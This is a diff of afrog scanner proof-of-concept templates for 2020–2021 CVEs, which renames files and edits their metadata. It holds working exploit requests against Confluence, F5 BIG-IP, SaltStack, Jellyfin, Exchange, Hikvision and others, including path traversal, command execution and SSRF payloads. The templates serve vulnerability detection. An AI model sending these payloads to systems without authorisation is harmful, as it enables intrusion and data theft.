11	9		r1: randomInt(10000, 99999)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /graphql
18	15		headers:
		skipped 6 lines

afrog-pocs/cve/2020/CVE-2020-9496.yml afrog-pocs/CVE/2020/CVE-2020-9496.yaml

Content is identical

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/craftcms-seomatic-cve-2020-9757-rce.yml afrog-pocs/CVE/2020/CVE-2020-9757.yaml

1		-	id: craftcms-seomatic-cve-2020-9757-rce
	1	+	id: CVE-2020-9757
2	2
3	3		info:
4		-	name: craftcms-seomatic-cve-2020-9757-rce
	4	+	name: SEOmatic < 3.3.0 Server-Side Template Injection
5	5		author: x1n9Qi8
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		r2: randomInt(40000, 44800)
13	11		rules:
14	12		poc10:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
19	16		expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
20	17		poc20:
21	18		request:
22		-	cache: true
23	19		method: GET
24	20		path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
25	21		expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/jellyfin-file-read-cve-2021-21402.yml afrog-pocs/CVE/2021/CVE-2021-21402.yaml

1		-	id: jellyfin-file-read-cve-2021-21402
	1	+	id: CVE-2021-21402
2	2
3	3		info:
4		-	name: jellyfin-file-read-cve-2021-21402
	4	+	name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read
5	5		author: Print1n(https://github.com/Print1n)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
16	13		expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml afrog-pocs/CVE/2021/CVE-2021-21972.yaml

1		-	id: vmware-vcenter-unauthorized-rce-cve-2021-21972
	1	+	id: CVE-2021-21972
2	2
3	3		info:
4		-	name: vmware-vcenter-unauthorized-rce-cve-2021-21972
	4	+	name: VMware vCenter Unauthenticated RCE
5	5		author: B1anda0(https://github.com/B1anda0)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /ui/vropspluginui/rest/services/uploadova
16		-	follow_redirects: false
17	13		expression: response.status == 405 && response.body.bcontains(b"Method Not Allowed")
18	14		r1:
19	15		request:
20		-	cache: true
21	16		method: GET
22	17		path: /ui/vropspluginui/rest/services/getstatus
23		-	follow_redirects: false
24	18		expression: response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress")
25	19		expression: r0() && r1()
26	20

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/vmware-vrealize-cve-2021-21975-ssrf.yml afrog-pocs/CVE/2021/CVE-2021-21975.yaml

1		-	id: vmware-vrealize-cve-2021-21975-ssrf
	1	+	id: CVE-2021-21975
2	2
3	3		info:
4		-	name: vmware-vrealize-cve-2021-21975-ssrf
	4	+	name: vRealize Operations Manager API SSRF (VMWare Operations)
5	5		author: Loneyer
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /casa/nodes/thumbprints
16	13		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-22205.yaml afrog-pocs/CVE/2021/CVE-2021-22205.yaml

		skipped 12 lines
13	13		- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
14	14		- https://hackerone.com/reports/1154542
15	15		- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
16		-	classification:
17		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
18		-	cvss-score: 9.90
19		-	cve-id: CVE-2021-22205
20		-	cwe-id: CWE-20
21		-	tags: cve,cve2021,gitlab,rce
22	16
23		-	manual: true
24		-	transport: http
25	17		rules:
26	18		r0:
27	19		request:
28		-	cache: true
29	20		method: GET
30	21		path: /users/sign_in
31	22		follow_redirects: true
		skipped 92 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/gitlab-ssrf-cve-2021-22214.yml afrog-pocs/CVE/2021/CVE-2021-22214.yaml

1		-	id: gitlab-ssrf-cve-2021-22214
	1	+	id: CVE-2021-22214
2	2
3	3		info:
4		-	name: gitlab-ssrf-cve-2021-22214
	4	+	name: Unauthenticated Gitlab SSRF - CI Lint API
5	5		author: mumu0215(https://github.com/mumu0215)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /api/v4/ci/lint
16	13		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/f5-cve-2021-22986.yml afrog-pocs/CVE/2021/CVE-2021-22986.yaml

1		-	id: f5-cve-2021-22986
	1	+	id: CVE-2021-22986
2	2
3	3		info:
4		-	name: f5-cve-2021-22986
	4	+	name: F5 BIG-IP iControl REST unauthenticated RCE
5	5		author: Hex
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /mgmt/tm/util/bash
19	16		headers:
		skipped 1 lines
21	18		Content-Type: application/json
22	19		X-F5-Auth-Token: ' '
23	20		body: '{"command":"run","utilCmdArgs":"-c ''expr {{r1}} + {{r2}}''"}'
24		-	follow_redirects: false
25	21		expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
26	22		expression: r0()
27	23
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/saltstack-cve-2021-25282-file-write.yml afrog-pocs/CVE/2021/CVE-2021-25282.yaml

1		-	id: saltstack-cve-2021-25282-file-write
	1	+	id: CVE-2021-25282
2	2
3	3		info:
4		-	name: saltstack-cve-2021-25282-file-write
	4	+	name: SaltStack Salt Unautherenticated Remote Command Execution
5	5		author: jweny(https://github.com/jweny)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomLowercase(5)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /run
18		-	follow_redirects: false
19	15		expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async")
20	16		r1:
21	17		request:
22		-	cache: true
23	18		method: POST
24	19		path: /run
25	20		headers:
26	21		Content-type: application/json
27	22		body: '{"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"}'
28		-	follow_redirects: false
29	23		expression: response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body)
30	24		expression: r0() && r1()
31	25
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/confluence-cve-2021-26084.yml afrog-pocs/CVE/2021/CVE-2021-26084.yaml

1		-	id: confluence-cve-2021-26084
	1	+	id: CVE-2021-26084
2	2
3	3		info:
4		-	name: confluence-cve-2021-26084
	4	+	name: Confluence Server OGNL injection RCE
5	5		author: Loneyer(https://github.com/Loneyers)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(100000, 999999)
12	10		r2: randomInt(100000, 999999)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /pages/createpage-entervariables.action?SpaceKey=x
19	16		body: \|
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/confluence-cve-2021-26085-arbitrary-file-read.yml afrog-pocs/CVE/2021/CVE-2021-26085.yaml

1		-	id: confluence-cve-2021-26085-arbitrary-file-read
	1	+	id: CVE-2021-26085
2	2
3	3		info:
4		-	name: confluence-cve-2021-26085-arbitrary-file-read
	4	+	name: Confluence Pre-Authorization Arbitrary File Read
5	5		author: wulalalaaa(https://github.com/wulalalaaa)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		rand: randomLowercase(6)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /s/{{rand}}/_/;/WEB-INF/web.xml
18		-	follow_redirects: false
19	15		expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
20	16		expression: r0()
21	17

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/exchange-cve-2021-26855-ssrf.yml afrog-pocs/CVE/2021/CVE-2021-26855.yaml

1		-	id: exchange-cve-2021-26855-ssrf
	1	+	id: CVE-2021-26855
2	2
3	3		info:
4		-	name: exchange-cve-2021-26855-ssrf
	4	+	name: Microsoft Exchange Server SSRF Vulnerability
5	5		author: sharecast
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /owa/auth/x.js
16	13		headers:
17	14		Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
18		-	follow_redirects: false
19	15		expression: response.headers["X-CalculatedBETarget"].icontains("localhost")
20	16		expression: r0()
21	17

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-27905.yaml afrog-pocs/CVE/2021/CVE-2021-27905.yaml

		skipped 10 lines
11	11		- https://ubuntu.com/security/CVE-2021-27905
12	12		- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
13	13		- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
14		-	classification:
15		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16		-	cvss-score: 9.80
17		-	cve-id: CVE-2021-27905
18		-	cwe-id: CWE-918
19	14
20		-	transport: http
21	15		rules:
22	16		r0:
23	17		request:
		skipped 13 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/jetty-cve-2021-28164.yml afrog-pocs/CVE/2021/CVE-2021-28164.yaml

1		-	id: jetty-cve-2021-28164
	1	+	id: CVE-2021-28164
2	2
3	3		info:
4		-	name: jetty-cve-2021-28164
	4	+	name: Jetty Authorization Before Parsing and Canonicalization
5	5		author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /%2e/WEB-INF/web.xml
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(b"</web-app>")
18	14		expression: r0()
19	15
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-29490.yml afrog-pocs/CVE/2021/CVE-2021-29490.yaml

1	1		id: CVE-2021-29490
2	2
3	3		info:
4		-	name: jellyfin-cve-2021-29490
	4	+	name: Jellyfin SSRF
5	5		author: 曦shen
6	6		severity: medium
7	7
8	8		set:
9	9		rand1: randomLowercase(6)
10		-	manual: true
11		-	transport: http
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /Images/Remote?imageUrl=http://{{rand1}}.baidu.com
18	15		follow_redirects: true
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/CVE/2021/CVE-2021-29622.yaml

1	+	id: CVE-2021-29622
2	+
3	+	info:
4	+	name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
5	+	author: fuzz7j(https://github.com/fuzz7j)
6	+	severity: medium
7	+
8	+	rules:
9	+	r0:
10	+	request:
11	+	method: GET
12	+	path: /new/newhttps:/baidu.com
13	+	expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?"
14	+	expression: r0()
15	+

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/lanproxy-cve-2021-3019-lfi.yml afrog-pocs/CVE/2021/CVE-2021-3019.yaml

1		-	id: lanproxy-cve-2021-3019-lfi
	1	+	id: CVE-2021-3019
2	2
3	3		info:
4		-	name: lanproxy-cve-2021-3019-lfi
	4	+	name: Lanproxy Directory Traversal
5	5		author: pa55w0rd(www.pa55w0rd.online/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /../conf/config.properties
16	13		expression: response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/laravel-cve-2021-3129.yml afrog-pocs/CVE/2021/CVE-2021-3129.yaml

1		-	id: laravel-cve-2021-3129
	1	+	id: CVE-2021-3129
2	2
3	3		info:
4		-	name: laravel-cve-2021-3129
	4	+	name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
5	5		author: Jarcis-cy(https://github.com/Jarcis-cy)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r: randomLowercase(12)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /_ignition/execute-solution
18	15		headers:
		skipped 15 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/pentaho-cve-2021-31602-authentication-bypass.yml afrog-pocs/CVE/2021/CVE-2021-31602.yaml

1		-	id: pentaho-cve-2021-31602-authentication-bypass
	1	+	id: CVE-2021-31602
2	2
3	3		info:
4		-	name: pentaho-cve-2021-31602-authentication-bypass
	4	+	name: Pentahoa uthentication bypass
5	5		author: For3stCo1d (https://github.com/For3stCo1d)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /pentaho/api/userrolelist/systemRoles?require-cfg.js
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"<roles>Anonymous</roles></roleList>")
18	14		r1:
19	15		request:
20		-	cache: true
21	16		method: GET
22	17		path: /api/userrolelist/systemRoles?require-cfg.js
23		-	follow_redirects: false
24	18		expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"<roles>Anonymous</roles></roleList>")
25	19		expression: r0() \|\| r1()
26	20
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/node-red-dashboard-file-read-cve-2021-3223.yml afrog-pocs/CVE/2021/CVE-2021-3223.yaml

1		-	id: node-red-dashboard-file-read-cve-2021-3223
	1	+	id: CVE-2021-3223
2	2
3	3		info:
4		-	name: node-red-dashboard-file-read-cve-2021-3223
	4	+	name: Node RED Dashboard - Directory Traversal
5	5		author: Print1n(http://print1n.top)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
16	13		expression: response.status == 200 && response.body.bcontains(bytes("Node-RED web server is listening")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/dahua-cve-2021-33044-authentication-bypass.yml afrog-pocs/CVE/2021/CVE-2021-33044.yaml

1		-	id: dahua-cve-2021-33044-authentication-bypass
	1	+	id: CVE-2021-33044
2	2
3	3		info:
4		-	name: dahua-cve-2021-33044-authentication-bypass
	4	+	name: Dahua IPC/VTH/VTO devices Authentication Bypass
5	5		author: For3stCo1d (https://github.com/For3stCo1d)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /RPC2_Login
16	13		body: '{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}'
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-36260.yml afrog-pocs/CVE/2021/CVE-2021-36260.yaml

		skipped 9 lines
10	10		- https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
11	11		- https://nvd.nist.gov/vuln/detail/CVE-2021-36260
12	12		- https://github.com/Aiminsun/CVE-2021-36260
13		-	classification:
14		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15		-	cvss-score: 9.8
16		-	cve-id: CVE-2021-36260
17		-	cwe-id: CWE-77,CWE-20
18		-	metadata:
19		-	shodan-query: http.favicon.hash:999357577
20		-	tags: cve,cve2021,hikvision,rce,iot,intrusive
21	13
22		-	manual: true
23		-	transport: http
24	14		set:
25	15		r1: randomLowercase(5)
26	16		r2: randomLowercase(5)
		skipped 2 lines
29	19		rules:
30	20		r1:
31	21		request:
32		-	cache: true
33	22		method: PUT
34	23		path: /SDK/webLanguage
35	24		headers:
		skipped 4 lines
40	29		expression: response.status == 500 && response.body.bcontains(b"<requestURL>/SDK/webLanguage</requestURL>")
41	30		r2:
42	31		request:
43		-	cache: true
44	32		method: GET
45	33		path: /{{r4}}
46	34		headers:
		skipped 1 lines
48	36		expression: response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) \|\| response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4)))
49	37		clean:
50	38		request:
51		-	cache: true
52	39		method: PUT
53	40		path: /SDK/webLanguage
54	41		headers:
		skipped 8 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/novnc-url-redirection-cve-2021-3654.yml afrog-pocs/CVE/2021/CVE-2021-3654.yaml

1		-	id: novnc-url-redirection-cve-2021-3654
	1	+	id: CVE-2021-3654
2	2
3	3		info:
4		-	name: novnc-url-redirection-cve-2021-3654
	4	+	name: noVNC Open Redirect
5	5		author: txf(https://github.com/tangxiaofeng7)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13	11		method: GET
14	12		path: "/"
15		-	follow_redirects: false
16	13		expression: \|
17	14		response.status == 200 && response.body.bcontains(b"<title>noVNC</title>")
18	15		r1:
19	16		request:
20	17		method: GET
21	18		path: "//baidu.com/%2f.."
22		-	follow_redirects: false
23	19		expression: \|
24	20		response.status == 301 && response.headers["location"] == "//baidu.com/%2f../"
25	21		expression: r0() && r1()
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-36749.yml afrog-pocs/CVE/2021/CVE-2021-36749.yaml

		skipped 8 lines
9	9		- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
10	10		- https://www.cvedetails.com/cve/CVE-2021-36749/
11	11		- https://github.com/BrucessKING/CVE-2021-36749
12		-	classification:
13		-	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
14		-	cvss-score: 6.5
15		-	cve-id: CVE-2021-36749
16		-	cwe-id: CWE-668
17		-	tags: cve,cve2021,apache,lfi,auth-bypass,druid
18	12
19		-	manual: true
20		-	transport: http
21	13		rules:
22	14		druid1:
23	15		request:
24		-	cache: true
25	16		method: POST
26	17		path: /druid/indexer/v1/sampler?for=connect
27	18		headers:
		skipped 3 lines
31	22		expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
32	23		druid2:
33	24		request:
34		-	cache: true
35	25		method: POST
36	26		path: /druid/indexer/v1/sampler?for=connect
37	27		headers:
		skipped 6 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2021/CVE-2021-40438.yml afrog-pocs/CVE/2021/CVE-2021-40438.yaml

		skipped 4 lines
5	5		author: pdteam
6	6		severity: critical
7	7		description: Apache 2.4.8 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
8		-	remediation: Upgrade to Apache version 2.4.49 or newer.
9	8		reference:
10	9		- https://firzen.de/building-a-poc-for-cve-2021-40438
11	10		- https://httpd.apache.org/security/vulnerabilities_24.html
12	11		- https://nvd.nist.gov/vuln/detail/CVE-2021-40438
13		-	tags: cve,cve2021,ssrf,apache,mod-proxy
14		-	classification:
15		-	cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
16		-	cvss-score: 9.00
17		-	cve-id: CVE-2021-40438
18		-	cwe-id: CWE-918
19	12
20		-	manual: true
21		-	transport: http
22	13		rules:
23	14		r0:
24	15		request:
25		-	cache: true
26	16		method: GET
27	17		path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA